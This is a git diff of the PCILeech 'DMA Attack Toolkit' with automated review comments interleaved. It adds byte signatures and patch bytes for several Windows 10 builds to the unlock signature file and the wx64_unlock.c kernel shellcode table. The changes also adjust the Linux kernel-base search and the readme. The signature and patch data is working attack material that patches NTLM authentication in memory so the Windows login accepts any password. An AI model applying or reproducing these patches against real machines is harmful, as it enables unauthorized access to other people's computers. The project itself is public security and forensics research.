diff --git a/files/unlock_win10x64.sig b/files/unlock_win10x64.sig
index aa35d68..2eaeee4 100644
--- a/files/unlock_win10x64.sig
+++ b/files/unlock_win10x64.sig
@@ -2,20 +2,32 @@
 # syntax: see signature_info.txt for more information.
 #
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2015-07-10)]
+# signature for Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384]
 5DF,FF154B1C,5E8,0F8518FB,5E8,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2015-10-30)]
+# signature for Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0]
 62F,FF15B31B,638,0F8518FB,638,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2016-07-16)]
+# signature for Windows 10 x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0]
 6dF,FF15D31B,6e8,0F8518FB,6e8,909090909090
 #
-# signature for Windows 10 x64 [NtlmShared.dll (2017-03-18)]
+# signature for Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0]
 615,FF15C51C,61e,0F852EFB,61e,909090909090
+# signature for Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106]
+625,FF15B51C,62e,0F852EFB,62e,909090909090
 #
 # signature for Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15]
 615,FF15D51C,61e,0F852EFB,61e,909090909090
 #
 # signature for Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1]
-695,FF15551C,69e,0F852EFB,69e,909090909090
\ No newline at end of file
+695,FF15551C,69e,0F852EFB,69e,909090909090
+#
+# signature for Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1]
+740,FF15B21B,749,0F840BFBFFFF,749,0F85
+#
+# signature for Windows 10 x64 [NtlmShared.dll (2019-03-19)/10.0.18362.1]
+# signature for Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418]
+741,32C0E904FBFFFF,741,32C0E904FBFFFF,741,B001E904FBFFFF
+#
+# signature for Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1]
+426,48FF155320,435,0F84BAFAFFFF,435,0F85
\ No newline at end of file
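Review bot: The new 10.0.15063.2106 entry does not agree with the same entry added to pcileech_shellcode/wx64_unlock.c in this commit: here the first search chunk at offset 625 is `FF15B51C`, while the C table has `0xff, 0x15, 0xc5, 0x1c` at 0x625 — exactly the bytes of the 10.0.15063.0 entry directly above it, which looks like a copy-paste slip on one side. Only one of the two can be right for that module version, so please check which and make both tables agree; the other new entries (17763.1, 18362.x, 19041.1) are consistent between the two files (the .sig carries a longer second search pattern for 18362, which is harmless). Since the same data is now maintained in two places, a header line such as `# NB: keep in sync with the oSigs table in pcileech_shellcode/wx64_unlock.c` would make the duplication visible to the next editor.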
diff --git a/files/wx64_unlock.ksh b/files/wx64_unlock.ksh
index 583856c..7657068 100644
Binary files a/files/wx64_unlock.ksh and b/files/wx64_unlock.ksh differ
diff --git a/pcileech/kmd.c b/pcileech/kmd.c
index d102ab5..6da8135 100644
--- a/pcileech/kmd.c
+++ b/pcileech/kmd.c
@@ -363,7 +363,7 @@ _Success_(return)
 BOOL KMD_LinuxFindFunctionAddrTBL_RelativeSymTabSearch(_In_ PBYTE pb, _In_ DWORD cb, _In_ DWORD cbStart, _In_ PKERNELSEEKER pS)
 {
 DWORD o, oFn;
- for(o = cbStart; o < cb - 8; o += 8) {
+ for(o = cbStart; o < cb - 8; o += 4) {
 if(o + *(PDWORD)(pb + o + 4) + 4 == pS->aSeek) {
 oFn = o + *(PDWORD)(pb + o);
 if((oFn < 0x02000000) && !(oFn & 0xf) && (oFn != o)) {
@@ -455,9 +455,10 @@ BOOL KMD_Linux46KernelSeekSignature(_Out_ PSIGNATURE pSignature)
 QWORD KMD_Linux48KernelBaseSeek()
 {
 PPAGE_STATISTICS pPageStat = NULL;
- BYTE pb[0x1000], pbCMP90[0x400], pbCMP00[0x100];
+ BYTE pb[0x1000], pbCMPcc[0x400], pbCMP90[0x400], pbCMP00[0x100];
 QWORD qwA, qwAddrMax, i;
 BOOL isAuthenticAMD, isGenuineIntel;
+ memset(pbCMPcc, 0xcc, 0x400);
 memset(pbCMP90, 0x90, 0x400);
 memset(pbCMP00, 0x00, 0x100);
 qwA = max(0x01000000, ctxMain->cfg.qwAddrMin) & 0xffffffffffe00000;
@@ -482,8 +483,8 @@ QWORD KMD_Linux48KernelBaseSeek()
 if(!isGenuineIntel || !isAuthenticAMD) {
 continue;
 }
- // Verify that page ends with 0x400 NOPs (0x90).
- if(!LcRead(ctxMain->hLC, qwA, 0x1000, pb) || memcmp(pb + 0xc00, pbCMP90, 0x400)) {
+ // Verify that page ends with 0x400 NOPs (0x90) or 0x400 0xCC.
+ if(!LcRead(ctxMain->hLC, qwA, 0x1000, pb) || (memcmp(pb + 0xc00, pbCMP90, 0x400) && memcmp(pb + 0xc00, pbCMPcc, 0x400))) {
 continue;
 }
 // read kernel base + 0x1000 (hypercall page?) and check that it ends with at least 0x100 0x00.
diff --git a/pcileech/version.h b/pcileech/version.h
index 336c464..b00486b 100644
--- a/pcileech/version.h
+++ b/pcileech/version.h
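Review bot: `cb - 8` in the changed loop header is unsigned DWORD arithmetic, so a buffer shorter than 8 bytes wraps the bound to a huge value and the loop reads far past pb; halving the stride doubles the number of such reads. A guard before the loop, `if(cb < 8) { return FALSE; }`, closes that, and with o advancing by 4 the two DWORD reads at pb + o and pb + o + 4 then stay inside cb on every iteration (o <= cb - 9). The motivation for the 8 -> 4 change is not stated anywhere in the hunk; a comment on the loop such as `// table entries are not guaranteed 8-byte aligned, so scan at DWORD granularity` would help the next reader, if that is indeed the reason — please confirm. KMD_LinuxFindFunctionAddrTBL_RelativeSymTabSearch's body continues past the hunk.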
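Review bot: The added `pbCMPcc` extends the existing pattern of a 0x400-byte stack scratch buffer filled by memset on every call purely so that memcmp can test whether a page tail consists of one repeated byte, and the compare in the third kmd.c hunk now has to run against two such buffers. A small fill-check helper removes the scratch buffers (`pbCMPcc`, `pbCMP90` and, for its compare outside this hunk, `pbCMP00`), their memsets, and the `0x400` length that is repeated in each compare, and reads as the predicate the comment already describes. The declaration and the new memset line in this hunk would go away; the rewritten condition of the third hunk is shown below. KMD_Linux48KernelBaseSeek's body continues past the hunk.
```c
// TRUE if all cb bytes at pb equal b; replaces the memset/memcmp scratch buffers.
static BOOL KMD_IsFilledWith(_In_ PBYTE pb, _In_ DWORD cb, _In_ BYTE b)
{
    DWORD i;
    for(i = 0; i < cb; i++) {
        if(pb[i] != b) { return FALSE; }
    }
    return TRUE;
}
// … unchanged: KMD_Linux48KernelBaseSeek up to the page read (pbCMPcc/pbCMP90 declarations and memsets removed) …
        // Verify that page ends with 0x400 NOPs (0x90) or 0x400 0xCC.
        if(!LcRead(ctxMain->hLC, qwA, 0x1000, pb) || !(KMD_IsFilledWith(pb + 0xc00, 0x400, 0x90) || KMD_IsFilledWith(pb + 0xc00, 0x400, 0xcc))) {
```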
@@ -3,8 +3,8 @@
 #define VERSION_MAJOR 4
 #define VERSION_MINOR 6
-#define VERSION_REVISION 1
-#define VERSION_BUILD 11
+#define VERSION_REVISION 2
+#define VERSION_BUILD 12
 #define VER_FILE_DESCRIPTION_STR "The PCILeech Direct Memory Access Attack Toolkit"
 #define VER_FILE_VERSION VERSION_MAJOR, VERSION_MINOR, VERSION_REVISION, VERSION_BUILD
diff --git a/pcileech_shellcode/wx64_unlock.c b/pcileech_shellcode/wx64_unlock.c
index 17fb5c2..7126f46 100644
--- a/pcileech_shellcode/wx64_unlock.c
+++ b/pcileech_shellcode/wx64_unlock.c
@@ -129,59 +129,88 @@ NTSTATUS Unlock_FindAndPatch(_In_ PKERNEL_FUNCTIONS2 fnk2, _Inout_ PBYTE pbPages return E_FAIL; } -#define NUMBER_OF_SIGNATURES 10 +#define NUMBER_OF_SIGNATURES 13 NTSTATUS Unlock(_In_ QWORD qwAddrNtosBase) { SIGNATURE oSigs[NUMBER_OF_SIGNATURES] = { - { .chunk = { // win8.1x64 msv1_0.dll (2014-10-29) + // win8.1x64 msv1_0.dll (2014-10-29) + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x42, 0xA4 } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0x46, 0x88 } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win8.1x64 msv1_0.dll (2015-10-30) + // win8.1x64 msv1_0.dll (2015-10-30) + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0xC2, 0x07 } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xCE, 0xBC } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win8.1x64 msv1_0.dll (2016-03-16) + // win8.1x64 msv1_0.dll (2016-03-16) + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xFF, 0x15, 0x22, 0x04 } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0F, 0x85, 0xB2, 0xB9 } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2015-07-10) + // Windows 10 x64 [NtlmShared.dll (2015-07-10)/10.0.10240.16384] + { .chunk = { { .cbOffset = 0x5df,.cb = 4,.pb = { 0xff, 0x15, 0x4b, 0x1c } }, { .cbOffset = 0x5e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x5e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2015-10-30::10.0.10586.0) + // Windows 10 x64 [NtlmShared.dll (2015-10-30)/10.0.10586.0] + { .chunk = { { .cbOffset = 0x62f,.cb = 4,.pb = { 0xff, 0x15, 0xb3, 0x1b } }, { .cbOffset = 0x638,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x638,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2016-07-16::10.0.14393.0) + // Windows 10 
x64 [NtlmShared.dll (2016-07-16)/10.0.14393.0] + { .chunk = { { .cbOffset = 0x6df,.cb = 4,.pb = { 0xff, 0x15, 0xd3, 0x1b } }, { .cbOffset = 0x6e8,.cb = 4,.pb = { 0x0f, 0x85, 0x18, 0xfb } }, { .cbOffset = 0x6e8,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2017-03-18::10.0.15063.0) + // Windows 10 x64 [NtlmShared.dll (2017-03-18)/10.0.15063.0] + { .chunk = { { .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } }, { .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, { .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2017-09-29::10.0.16299.15) + // Windows 10 x64 [NtlmShared.dll (2019-09-30)/10.0.15063.2106] + {.chunk = { + {.cbOffset = 0x625,.cb = 4,.pb = { 0xff, 0x15, 0xc5, 0x1c } }, + {.cbOffset = 0x62e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, + {.cbOffset = 0x62e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } + }, + // Windows 10 x64 [NtlmShared.dll (2017-09-29)/10.0.16299.15] + { .chunk = { { .cbOffset = 0x615,.cb = 4,.pb = { 0xff, 0x15, 0xd5, 0x1c } }, { .cbOffset = 0x61e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, { .cbOffset = 0x61e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - { .chunk = { // win10x64 NtlmShared.dll (2018-04-11::10.0.17134.1) + // Windows 10 x64 [NtlmShared.dll (2018-04-11)/10.0.17134.1] + { .chunk = { { .cbOffset = 0x695,.cb = 4,.pb = { 0xff, 0x15, 0x55, 0x1c } }, { .cbOffset = 0x69e,.cb = 4,.pb = { 0x0f, 0x85, 0x2e, 0xfb } }, { .cbOffset = 0x69e,.cb = 6,.pb = { 0x90, 0x90, 0x90, 0x90, 0x90, 0x90 } } } }, - {.chunk = { // win10x64 NtlmShared.dll (2019-10-06::10.0.18362.418) + // Windows 10 x64 [NtlmShared.dll (2018-09-15)/10.0.17763.1] + {.chunk = { + {.cbOffset = 0x740,.cb = 4,.pb = { 0xff, 0x15, 0xb2, 0x1b } }, + {.cbOffset = 0x749,.cb = 4,.pb = { 0x0f, 0x84, 0x0b, 0xfb } }, + {.cbOffset = 0x749,.cb = 2,.pb = { 0x0f, 0x85 } } } + }, + // Windows 10 x64 
[NtlmShared.dll (2019-03-19)/10.0.18362.1] + // Windows 10 x64 [NtlmShared.dll (2019-10-06)/10.0.18362.418] + {.chunk = { {.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } }, {.cbOffset = 0x741,.cb = 6,.pb = { 0x32, 0xC0, 0xE9, 0x04, 0xFB, 0xFF } }, {.cbOffset = 0x741,.cb = 2,.pb = { 0xb0, 0x01 } } } + }, + // Windows 10 x64 [NtlmShared.dll (2019-12-07)/10.0.19041.1] + {.chunk = { + {.cbOffset = 0x426,.cb = 5,.pb = { 0x48, 0xff, 0x15, 0x53, 0x20 } }, + {.cbOffset = 0x435,.cb = 6,.pb = { 0x0f, 0x84, 0xba, 0xfa, 0xff, 0xff } }, + {.cbOffset = 0x435,.cb = 2,.pb = { 0x0f, 0x85 } } } } }; KERNEL_FUNCTIONS2 fnk2;
diff --git a/readme.md b/readme.md
index e455a27..9c7a290 100644
--- a/readme.md
+++ b/readme.md
@@ -70,8 +70,9 @@ Please find a summary of the supported software based memory acquisition methods
 | [VMware memory save file](https://github.com/ufrisk/LeechCore/wiki/Device_File) | File | No | No | Yes | No |
 | [TotalMeltdown](https://github.com/ufrisk/LeechCore/wiki/Device_Totalmeltdown) | CVE-2018-1038 | Yes | Yes | No | No |
 | [DumpIt /LIVEKD](https://github.com/ufrisk/LeechCore/wiki/Device_DumpIt) | Live Memory | Yes | No | No | No |
-| [LiveKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveKd) | Live Memory | Yes | No | No | No |
 | [WinPMEM](https://github.com/ufrisk/LeechCore/wiki/Device_WinPMEM) | Live Memory | Yes | No | No | No |
+| [LiveKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveKd) | Live Memory | Yes | No | No | No |
+| [LiveCloudKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveCloudKd) | Live Memory | Yes | No | No | Yes |
 | [Hyper-V Saved State](https://github.com/ufrisk/LeechCore/wiki/Device_HyperV_SavedState) | File | No | No | No | Yes |
 | [LeechAgent*](https://github.com/ufrisk/LeechCore/wiki/Device_Remote) | Remote | | | No | No |
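Review bot: `NUMBER_OF_SIGNATURES` is bumped by hand to 13 in the same hunk that grows the initializer list, and nothing ties the two together: one entry too many is a compile error, but one too few silently zero-fills the tail of oSigs, and a SIGNATURE with cbOffset 0 and cb 0 then reaches Unlock_FindAndPatch with whatever that function makes of it (its body is outside the hunk). Letting the array size itself avoids the drift: `SIGNATURE oSigs[] = {` for the declaration and, after the table, `const DWORD cSigs = sizeof(oSigs) / sizeof(oSigs[0]);` used in place of the macro in the rest of Unlock, whose body continues past the hunk. As a point of style, the new entries are written `{.chunk = {` while the entries re-laid-out in the same hunk keep `{ .chunk = {`, and the 18362 entry packs its three chunks on one line unlike every other entry; one layout for all would make the table easier to scan.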
@@ -234,3 +235,7 @@ v4.1 [v4.6](https://github.com/ufrisk/pcileech/releases/tag/v4.6) * Support for [LiveCloudKd](https://github.com/ufrisk/LeechCore/wiki/Device_LiveCloudKd). + +Latest: +* Bug fixes. +* Unlock signature updates - Win10/Linux (NB! most recent kernels on Linux not yet supported),